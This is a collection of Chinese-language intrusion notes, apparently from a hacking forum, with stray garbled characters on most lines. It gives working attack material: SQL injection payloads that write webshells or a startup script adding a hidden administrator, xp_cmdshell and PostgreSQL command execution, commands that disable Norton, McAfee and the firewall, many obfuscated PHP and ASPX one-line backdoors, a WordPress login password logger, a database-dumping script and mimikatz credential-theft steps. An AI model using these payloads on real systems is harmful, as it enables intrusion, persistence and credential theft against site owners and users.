5 u( |" i& K, x( H {( O( |insert into a values ("set wshshell=createobject (""wscript.shell"") " );
% n4 Y$ R9 `2 u D5 Iinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
& z# x. V& x/ c4 h7 _" D, {) ^4 winsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
7 Q9 o! i* Y6 S- e) W( t) @, L/ oselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
" K. f) H+ \* k. P+ p* n0 Fdrop table a;
: _; Q4 \, F( q$ _2 K, s, @5 k0 x# y" R( p" K
英文版本:/ |/ y4 Y/ j- p% z% C( X) h; x
1 z& k2 o J3 _* \+ \" j# [use test;" G" m6 C* o; X s, a
create table a (cmd text);, m( u5 J- D; R) y5 ^
insert into a values ("set wshshell=createobject (""wscript.shell"") " );. t: g' k, J6 E7 D8 Z% g
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );. P$ E" g& M; N! v1 ~- Y
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );) e% R) m0 R" @
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
h- \. B/ ^3 u2 j/ Pdrop table a;4 C6 L+ Q1 H& u# n2 C
( [0 I7 s( A4 ~% b6 pcreate table a (cmd BLOB);
) ?% m1 Q0 S9 [2 m3 S4 ainsert into a values (CONVERT(木马的16进制代码,CHAR));. C, K3 ^+ R7 [5 \6 F/ u
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'9 O3 r h! {& F: M* z0 |
drop table a;
( {# _" C. c; H5 R2 J5 f0 p
! [, l, v4 m* E R记录一下怎么处理变态诺顿
6 v: b9 C; e5 m0 e) H s查看诺顿服务的路径
3 P2 g+ D/ [5 u) F1 j+ [sc qc ccSetMgr# l7 v+ Y7 I: m; I7 W4 K
然后设置权限拒绝访问。做绝一点。。5 b. ]: u; p2 Z' V3 B. M- P8 ?
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
' o% _/ N) f1 N% N% P' o+ xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"% p; D% e. M* x2 |! D' B
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators1 ?. \* T; U/ Q( }" [ Y9 s$ ^
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone/ L$ ^. X# g8 p! u1 e7 h7 U
( I ] g5 R/ o1 Q
然后再重启服务器
c/ `$ I# a0 O' A: e: hiisreset /reboot/ g" u5 r7 }( a
这样就搞定了。。不过完事后。记得恢复权限。。。。, ~3 B$ l+ l7 X* g' A* F1 i4 J. d( ~
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F; I" |8 O9 O3 ]0 V/ Z h2 t7 |1 B
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
* T/ |: a; H- C* D& T' bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
0 @* `$ w; Y% V7 G( q+ S: mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
5 O2 i! m4 y7 y: LSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin2 h8 @1 j+ J! T
4 F) K/ \# B' x* V0 t
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')2 ^6 q% S+ I& l3 H O* j) K- h
: n! j2 Q% ^0 X1 Q8 A) Upostgresql注射的一些东西5 o7 D; G1 b% \5 U- b6 W
如何获得webshell
3 W4 M1 p9 a# P- Vhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 6 D5 t* P- ?1 z$ L: m' F& Z
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
, K$ p0 v( G+ k& T8 _ Nhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;# y3 m4 C% y) h7 G
如何读文件) c! l3 R0 ?, J5 x+ g
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
1 U4 L( D" S7 N7 o+ M% P! Qhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
# K h7 i$ S8 @5 T4 g, v# m2 Ihttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
3 _% x6 }/ l6 |/ m [" n* k N% F; J4 k- H
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。, l/ M! u% d* A' l
当然,这些的postgresql的数据库版本必须大于8.X
. K% I+ [. b& `6 {. l创建一个system的函数:7 p, ~8 O, C! ]$ y
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
+ G# f1 P4 G$ a! S1 x, U/ z7 f- K" b. _& x v* c& `) K5 a3 k
创建一个输出表:
3 u. N$ R2 }9 g' KCREATE TABLE stdout(id serial, system_out text)
" x6 O) b. R( x0 y5 z+ }& B
& I1 l/ U, y6 W4 G5 a3 b执行shell,输出到输出表内:
& \7 o: T }3 g5 o5 \/ e9 Q. i- ISELECT system('uname -a > /tmp/test')
4 F% m4 ~7 |2 w8 |0 L9 u/ p
& P/ l& t6 [$ Zcopy 输出的内容到表里面;& d# R* _" }9 W; _' _
COPY stdout(system_out) FROM '/tmp/test'9 s0 l& I8 z( u! ~
4 h* c% n+ ^$ K) e4 V4 g
从输出表内读取执行后的回显,判断是否执行成功& F0 F5 r2 S6 L: B2 X$ }
0 I3 q6 K) J- H G0 x8 d
SELECT system_out FROM stdout7 \7 J# z a0 f+ `! S
下面是测试例子0 d5 a9 |5 k8 b& e# |
5 n7 R |( Z4 r/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- : O% J+ K4 e$ T" k0 V1 w
6 Y$ u+ m" P3 u( A0 V# H7 j/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'; A- n. k( y# Q2 N
STRICT -- F+ B1 f+ T8 j6 a
! t) x$ V) g% {8 Q, z3 ^/store.php?id=1; SELECT system('uname -a > /tmp/test') --% c/ T9 s7 D% s
1 {* f/ l2 ~0 b W5 U: v7 {
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
* k1 F/ P Z9 E4 m, u% j6 u/ s. x* F3 H/ O
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--' n) e) C# a5 B8 V1 x# Q
net stop sharedaccess stop the default firewall8 W! s* C) ~" N7 C9 B
netsh firewall show show/config default firewall. T/ `$ u* f1 v2 l
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
+ T& U. Y; r7 S' C. Q$ P/ D. _# rnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
; t$ \" w5 V2 `7 X修改3389端口方法(修改后不易被扫出)
) f* [* K+ |& y* z$ ?5 K4 k( a修改服务器端的端口设置,注册表有2个地方需要修改 K, ]: `6 S. N* Y& B
7 P3 d: R: E4 k( s[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]$ B P9 J1 K' ~- I
PortNumber值,默认是3389,修改成所希望的端口,比如60009 ^( i' v4 \$ q i3 Z2 R
5 r- z* `" r8 a7 H6 {; z' ^第二个地方:
& |- V6 g0 {' {/ e: J! F[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
6 E( h, u: N& X4 X/ OPortNumber值,默认是3389,修改成所希望的端口,比如6000
" M& b" X8 O8 J9 v6 a+ e
, \6 r) X! ?- X6 p+ v1 e& A9 b现在这样就可以了。重启系统就可以了
* J# h( H5 ^1 w' Q4 a! \! M; u6 w' _1 v7 r6 d" v: h% T8 a U
查看3389远程登录的脚本
+ @' A. x+ Y; L2 c, U6 X保存为一个bat文件
! c& e4 x' s1 vdate /t >>D:\sec\TSlog\ts.log3 z) s& ?0 F2 g2 C' @3 Z7 {
time /t >>D:\sec\TSlog\ts.log4 `& g c* j' _# V& F2 y
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log( ?: g! b( L: x. ?$ Y
start Explorer8 t4 b' g, K& S2 R( o# Q% b8 O
! Z5 H3 u. g& z) }mstsc的参数:# R" g3 Q& S: w: O5 O* t
( P2 }, D1 S% `: h) E远程桌面连接
% E1 j, n1 M0 _1 W2 q R. M) r8 x2 {- @# E
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]* h+ Q3 k8 L# l2 \* ^
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
) z% e2 c' ^/ h# w5 U+ M- e2 j% H! a( h( F3 ^1 W/ O V: [! s6 _8 \
<Connection File> -- 指定连接的 .rdp 文件的名称。- p# x$ A' ]3 V. [
# [+ r. J2 m3 l7 a. A" B/v:<server[:port]> -- 指定要连接到的终端服务器。
' u$ E) _0 Q. v+ h; ^& m6 q% {, O" X! @8 M8 q- d! [2 {
/console -- 连接到服务器的控制台会话。+ h2 f/ B- E' x8 g$ F# k
( I9 S( ]+ X6 x, Q+ D- ~ k* P4 }& i( D
/f -- 以全屏模式启动客户端。, o6 X- {, @. N2 Z
: E' a$ V" ?3 O/w:<width> -- 指定远程桌面屏幕的宽度。! K# U4 z. A" X! q% r. U) B& C
7 j l0 t. _# g2 x7 \/h:<height> -- 指定远程桌面屏幕的高度。
0 o6 E, h$ H2 v; l9 T: z
# W6 T' S$ B0 s/edit -- 打开指定的 .rdp 文件来编辑。' e( W, l% X8 K+ i% C- s* T
- N- x& }4 V- m+ ~/migrate -- 将客户端连接管理器创建的旧版/ w. A9 r: k6 N5 P) x$ Q
连接文件迁移到新的 .rdp 连接文件。
" H! o% s# i+ _# `: i7 e
- K6 a5 Y: Q6 b5 w8 S; [8 ~
, {9 m6 z7 z! C其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
4 J+ l( V# v+ n& c. emstsc /console /v:124.42.126.xxx 突破终端访问限制数量9 g+ s" x; p6 t3 y* S$ @' `
, E$ ?* P3 }# a3 I6 M6 `
命令行下开启3389
0 {* r' z% x1 f% m) I! U$ _net user asp.net aspnet /add
, T/ D3 ?# y' ^* q& l# Knet localgroup Administrators asp.net /add7 R7 C/ ~) Q( ]. z
net localgroup "Remote Desktop Users" asp.net /add
- e/ K0 N0 v$ t8 l ^attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
) y; [7 R' y# M- gecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
) W9 n/ P, ^' w/ k& \2 |echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1) h6 p: K) G0 ^. V
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f: F: n9 w) v2 d( r: j: O# W" M' {4 D
sc config rasman start= auto; }9 I% v: ]* O$ m
sc config remoteaccess start= auto4 o6 g' h, z6 z& ~" v
net start rasman
% L+ c/ H( J# D" f; @net start remoteaccess4 c, S) [% j. F5 D6 m5 e% m
Media
( M4 j- K6 R* B0 ~2 M' {6 }' g<form id="frmUpload" enctype="multipart/form-data"3 k- x' ~# y3 l1 h# V& ^
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
1 ~9 f$ r3 `8 `. ~' t3 z<input type="file" name="NewFile" size="50"><br>. ]: j( z" w- q; N* r! b1 T" H$ O
<input id="btnUpload" type="submit" value="Upload">. D5 t1 @2 b4 ?1 l+ R1 {
</form>
& @ l# P. U o! f% D
4 |8 \; k! v) d; i5 I- ucontrol userpasswords2 查看用户的密码# n6 g5 k2 ]5 {) A Q# f0 Z) A
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径* w6 D* E/ N9 m& A: H1 ~" O
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
$ M, u) I) ^ H B$ P: L6 |6 l4 T) M! |0 B/ W( T! O& b9 |& ?$ v
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:0 d: ]( V0 s& L% D8 f+ g
测试1:9 g; ~! Q; @, `' _; b( \
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1! T. n4 k7 J0 k- M3 O# U9 j9 n1 f
! F: u5 o# a; Z+ B测试2:
( a4 f) g+ y9 s/ b) u0 g) J! H
& L: Q: Z4 n( P6 ~2 ycreate table dirs(paths varchar(100),paths1 varchar(100), id int). ]& X4 `, J( W8 [, d4 R; T: g
- l e0 z2 i8 G( z
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
1 ^7 h$ Q, S! d
) J9 A" P1 j: ]9 o" xSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t15 o+ C, c; {- m/ w- N- A: Y
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
. \ `( i- [" Q. c可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
" W8 N7 u, {) F! D! anet stop mcafeeframework% j- L: k0 u8 I7 d
net stop mcshield! q& }, A0 V* H, ]& {$ @: U
net stop mcafeeengineservice
* b& R: V6 k/ y0 {) cnet stop mctaskmanager
0 H# w- r4 a) @8 J' i# K, z) phttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
0 {+ T7 i! U$ X: y2 J
- B% X" ?, n" T7 ?* E+ V1 Y+ b ~; p VNCDump.zip (4.76 KB, 下载次数: 1)
: n4 c, T- ` G! t3 r1 [/ v密码在线破解http://tools88.com/safe/vnc.php3 k# {; k0 O: R$ c; K0 T3 y
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
7 l4 \* y: X6 s7 g8 ~4 P. z
- x# w' M3 `7 @! q5 y8 r! k* [- Xexec master..xp_cmdshell 'net user'
! ]5 w, r+ \+ F+ U1 Ymssql执行命令。' R9 k- f# h p- Z6 h" c5 e
获取mssql的密码hash查询
[4 v* r! r" t4 U( n3 v3 Eselect name,password from master.dbo.sysxlogins
% G! }% R Y# f0 m' r U d( }7 d! I, Z1 k; j
backup log dbName with NO_LOG;
K4 w0 E) y- ~+ G- P, Sbackup log dbName with TRUNCATE_ONLY;5 ^ z& U( p9 I* V4 b: Z
DBCC SHRINKDATABASE(dbName);
! Z2 ~! N, {( x1 l" M4 ~: j6 @mssql数据库压缩
# U3 J) I: j: O1 q+ Z b& X- Q3 I* L d/ }) [
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK$ A6 L. p6 Z1 w9 g& Y! G' s; Z
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。+ W+ ~- X: {8 q$ _6 e
, L' {+ v$ p0 @: l( D( D# l6 [
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak': F+ f7 n" |7 Q t |, U
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
# S& C2 c2 W2 F* q& @2 O
# N- ]7 W) g9 p* f: ?: x! S# N2 |Discuz!nt35渗透要点:
, r* l& I/ W# E2 t(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
# a5 L& p$ z8 i4 `3 M. p(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>+ m' \" q6 O" x9 k6 O
(3)保存。
. A9 d% {4 i5 F(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass8 G7 Z( D' F8 J* t
d:\rar.exe a -r d:\1.rar d:\website\& B( W+ R: y( f: I& r7 E0 T
递归压缩website/ g6 A# q4 v9 S5 E, ~
注意rar.exe的路径: n8 R) M1 b: Y; w
" x# N7 u" c( H7 o& j
<?php& H( o( \3 g3 M4 I
! X, b2 S, B! U! g A$telok = "0${@eval($_POST[xxoo])}";
* g) }& \3 q4 C0 o. ]: x+ [7 o/ e- v# A7 v$ X- l, Q9 M
$username = "123456";
. P# o, H' F5 V
8 D4 T& a. z. o. T R$userpwd = "123456";) N8 R h. s h. h
# ~8 e! Q+ p5 N8 `
$telhao = "123456";
$ |* _" J; {$ n- `
/ V( ]1 Q3 R' E: J, f( a) x( w$telinfo = "123456";
( y- H |2 J% G8 D5 f8 O6 w0 L* `8 _+ W7 _9 g4 K/ F1 ~ J- T# I
?>
7 J) ^- x; C l" i+ n$ mphp一句话未过滤插入一句话木马 a/ ?. ~3 o# Y& }* w Y% H
6 f! b5 @6 [- {, n1 G站库分离脱裤技巧 s. w3 ]5 R J; X
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'. X. K' B- g0 s) `. i4 Y6 A
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass') g9 }, V# ^# Y4 d
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。4 D$ C! f0 `5 v
这儿利用的是马儿的专家模式(自己写代码)。' j+ ^% h% e1 {) x
ini_set('display_errors', 1);
3 D1 D7 ` s( N, p! ~8 N) Gset_time_limit(0);; v m3 x: k, b0 [
error_reporting(E_ALL);
4 B% s# N: M8 S) [4 \$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
, K; Y5 S/ r% z! E- \3 v! r# zmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());* L9 Z5 |. G8 x& T6 K+ w3 O
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());- m& K) ?! U) s) |1 k
$i = 0;& z* s- `- |, V( Y
$tmp = '';
" q% Q8 C" j& Kwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {6 ?; K& x! a% J4 I# Z, D8 Q2 S- M$ b
$i = $i+1;. h8 F1 l% T& f& c
$tmp .= implode("::", $row)."\n";
9 D7 ?6 d( x4 P( Y) M if(!($i%500)){//500条写入一个文件. t- m* o) { t& N. {/ a
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';% Q" b. J3 @. \4 x& p
file_put_contents($filename,$tmp);
% l9 \- z! _4 w $tmp = '';
1 E5 A( ?: y' a! i# [ }8 c2 R, |8 {" [
}5 J% n+ X! p. w1 `9 f' Z5 M
mysql_free_result($result);5 r' ?& z7 }% i( {( D) C
4 Y7 {4 u: k: [5 ]- S l! V% k- |6 c1 v$ k4 }' J4 U4 `: B: n
! b& ?4 J4 R5 g3 p. ?' i
//down完后delete* C K, _4 i `6 b
' U/ k2 @4 M& x& j# D5 w1 H
: F0 y, c Y" \ m! V* a
ini_set('display_errors', 1);1 A# R& b$ f$ v: q$ f
error_reporting(E_ALL);) i9 w! J& r- a. G. t
$i = 0;% h( l0 W; A1 y9 z- N# B. j3 G- C
while($i<32) {! }& P4 Z% f. ^. p2 e
$i = $i+1;$ }6 q3 d( K" A1 P
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';0 s6 C7 T# S( M$ a L
unlink($filename);- R8 @/ s$ F1 d2 z
}
. E" q1 o" F3 @- Z* V( H1 [httprint 收集操作系统指纹
+ S$ v) S9 s3 F5 b8 ~扫描192.168.1.100的所有端口
2 X- ~* z6 f2 X) N$ e) d" Enmap –PN –sT –sV –p0-65535 192.168.1.100- {7 [/ y5 k0 H) k; O7 i; ~
host -t ns www.owasp.org 识别的名称服务器,获取dns信息% W: j& V) W: h8 i5 p# ]; N7 w
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
+ m8 |0 E2 c" l( W. aNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host5 Z/ T! g" ^- H' ^
: {2 q& F' s+ o) {4 z+ Y; u9 nDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册); ]! q# J U! d
, j8 Q" s+ }6 k1 ?3 e
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
4 S7 o2 K& }/ E+ W' N6 C# B1 ~9 G
( Z! ~7 W+ ^, s, Z1 M+ D: y Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
5 _( \5 \" X. p1 E2 H/ K6 u) p& M. Y5 H- {
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)7 w$ X& N$ U3 g7 ~8 `9 E
; E7 H1 B, K! ]4 y http://net-square.com/msnpawn/index.shtml (要求安装)
# o3 c! m" r: z- R/ l
7 o. u+ m1 Z: w f0 ~9 ]0 z tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
5 N6 U: S! b, q. e
2 A% R. {: k! a& w0 z5 h2 K: Q2 o SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找). F0 A% r2 S) _! G
set names gb2312/ ~/ T2 r. w; M# |
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
, P1 M! Q2 Y- S$ D, f# _0 N9 ~- M3 s' k$ m7 b, B
mysql 密码修改* @, p& e/ y3 o7 p Z0 Z
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
# O4 R, |3 ~. F0 h& k& L( O! t2 eupdate user set password=PASSWORD('antian365.com') where user='root';
* B5 ~5 I3 v1 p# Tflush privileges;
% h. B. M# f0 {0 h/ |! {0 e; X( [ O高级的PHP一句话木马后门9 O3 a- |2 I' `( R9 |8 d# w
; u6 f; }" [/ f- G# u% W. @
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
/ e7 j6 H/ z/ [" ] y: I; ?* n6 I' w) }/ k0 O
1、2 @2 V; Q( p$ }. \1 {( x2 D2 E
& p, e8 i8 @2 g' I" W6 K" D
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
- j* x! }6 }& i2 B# w& D
/ b: ]2 T p3 R$ x$hh("/[discuz]/e",$_POST['h'],"Access");! f, M1 t& g" W: @9 ^
) v; m9 [( E8 r/ P1 N//菜刀一句话, O9 I% d- V5 g) {# d4 m' f4 _
& Q0 c- Z! [& ^. h. }# J
2、6 q- j* C: k; r
+ N: L& L9 ?7 g$ B) t K$filename=$_GET['xbid'];
2 \2 ?8 Q) X8 h, k: j! p. _* t
& X4 s9 r) g7 {) m2 Y. q5 rinclude ($filename);% v+ y f |2 b8 F; C
$ L$ T; a `/ k5 w0 p
//危险的include函数,直接编译任何文件为php格式运行
' W0 F/ H9 q% \! O! m* n
1 G- B2 U) b/ Z8 g: x7 P3、
1 s" `8 o" h- r! Z, k. T& \0 B P
) K% u* F( a: \# C/ O8 j, ?$reg="c"."o"."p"."y";
) h' @- g$ |* p
4 J) P/ o, u& [) Q7 S% M$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
$ D3 Q( `; ^3 ?% a1 u# e7 h2 d* Y' D. ?' Z7 L: |
//重命名任何文件$ B2 N+ O( `* q0 f) V. ]% G
: f' ?. s1 I5 J- g1 ], B4、
8 ~/ U! Y2 e+ s; J6 U! l& c4 x$ Q7 o2 _1 [' x, L# B
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
( H2 C6 X5 o& }
: a! s/ N2 `( T8 n) {$ x# R$gzid("/[discuz]/e",$_POST['h'],"Access");$ Q0 y/ |5 E8 Y* C1 b4 c0 c
. b' ]1 w% {/ [' O4 z1 V/ Q
//菜刀一句话
_' v* V, m" ?9 H) }3 B* I8 Q& n* O9 Y! j5 b" ^. o) f
5、include ($uid);
7 F! A$ y- }- Y, s2 o- [$ q$ ~! {9 r
//危险的include函数,直接编译任何文件为php格式运行,POST
& \0 K" m, |7 ]' E$ ^) Z8 M5 f9 B. L7 l% c# x. N
8 k6 F+ a+ J; b% `3 E# d! b% l6 Q
//gif插一句话( S9 e7 o4 ?# R4 ^0 b
, e" q9 g$ T+ T( z; z6、典型一句话2 |: L* L! ?) ^5 u$ h; F+ D3 H
! N5 S0 Z+ V. N8 T
程序后门代码
/ g" G& u+ j, O' C3 L<?php eval_r($_POST[sb])?>6 P! V$ ^( v6 Y1 V
程序代码
9 L* k" k! c9 ?$ v7 I9 F<?php @eval_r($_POST[sb])?>$ `% ^3 @$ N) r% L3 ~$ ]
//容错代码& a5 F. x: L! A. Y; f! E1 U
程序代码
( V" ^# b6 y5 G& n1 s$ f: y( q<?php assert($_POST[sb]);?>
3 h/ Z3 H; v! o: E6 @: O8 d//使用lanker一句话客户端的专家模式执行相关的php语句% X% P Q8 T9 Z( o' P1 W/ @' V& U
程序代码& t2 V Z" x0 y/ `7 R# C0 D& D
<?$_POST['sa']($_POST['sb']);?>7 T; U) O2 K9 ]8 c, y
程序代码
3 [$ l% S. i: j2 _<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>$ B9 b( t9 ]6 S. \1 E6 h! U1 Y
程序代码; o) o" X f) v7 K; O2 m
<?php: r2 g# R8 M3 J3 V# ]
@preg_replace("/[email]/e",$_POST['h'],"error");3 A2 S6 `9 J, B" m9 H
?>1 b& r$ D% @0 k, b+ T: _+ \
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入9 j0 a2 X0 q& i
程序代码
% S. ?) M8 j3 ]5 N5 O# a) Y3 ^<O>h=@eval_r($_POST[c]);</O>
7 |$ Q! M7 Z% @5 K! t程序代码
6 G. j- F% x6 B% v<script language="php">@eval_r($_POST[sb])</script>
1 i" U$ Y! e" ?6 e& J//绕过<?限制的一句话
H* u- F( s b7 C; L& h* A! _% j! w& {' e5 N, v8 {3 {7 ?( e
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
/ l2 B4 Z' z2 W8 Y: k- l8 r详细用法:
8 t! u# D$ @" J1 i4 v" |! e( w1、到tools目录。psexec \\127.0.0.1 cmd
8 F- d( w& o/ w2、执行mimikatz
& s' _1 a4 f( ~7 G2 t, ^4 p( ^( x3、执行 privilege::debug/ K$ }% m& w; f3 }3 i0 H' |
4、执行 inject::process lsass.exe sekurlsa.dll
+ _4 d5 u! h) \! l5、执行@getLogonPasswords
' n( L" s$ S& }, \( ? L+ P6、widget就是密码
$ P9 Q2 C ?4 Z7、exit退出,不要直接关闭否则系统会崩溃。, w0 p! Y1 X. C6 M: U
/ i0 F( x- P+ V8 ^ ]http://www.monyer.com/demo/monyerjs/ js解码网站比较全面; {. V& X+ ^1 ?% S: P
, H8 ?/ a6 D) e) m- j( E4 O
自动查找系统高危补丁$ J6 Y2 r& E% o" z$ p4 w
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt' r& C0 S9 w, M9 f+ X
" T3 o# N- b( A! m# T突破安全狗的一句话aspx后门% O' b' n5 m% O3 ]# X
<%@ Page Language="C#" ValidateRequest="false" %>
. [& D. c' k7 i0 N1 |0 z3 T<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
( Z9 q6 E/ b* G7 P% p% [) \! Cwebshell下记录WordPress登陆密码
+ Q% D, \( S* X, ]2 T- p7 Pwebshell下记录Wordpress登陆密码方便进一步社工% `. ]! q% A8 p3 B; t2 U( g: f
在文件wp-login.php中539行处添加:
5 I1 R7 b# u2 Q2 J; W7 [// log password
( q" i- @6 I# Y5 {: S& v9 R$log_user=$_POST['log'];# K2 D" B$ A! q8 @( M5 w2 u
$log_pwd=$_POST['pwd'];
; p: D% L/ ^: T' i* K) |5 T$log_ip=$_SERVER["REMOTE_ADDR"];
% D6 k+ P) a$ X, y. C! b3 J$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
; s" V) i4 Y: X6 w* n$txt=$txt.”\r\n”;8 S! V) B/ U+ w/ ?/ K& s: @
if($log_user&&$log_pwd&&$log_ip){; [2 G0 p, a2 [" g8 `
@fwrite(fopen(‘pwd.txt’,”a+”),$txt); b6 o% H+ R0 @5 |1 Q& |
}5 q, B9 d0 t) P# e
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。: [, J5 H8 z/ R+ W9 M5 @: v
就是搜索case ‘login’
+ V0 f3 k+ ?5 [ o( R1 K在它下面直接插入即可,记录的密码生成在pwd.txt中,
. }' D6 q- a& r, S3 S其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
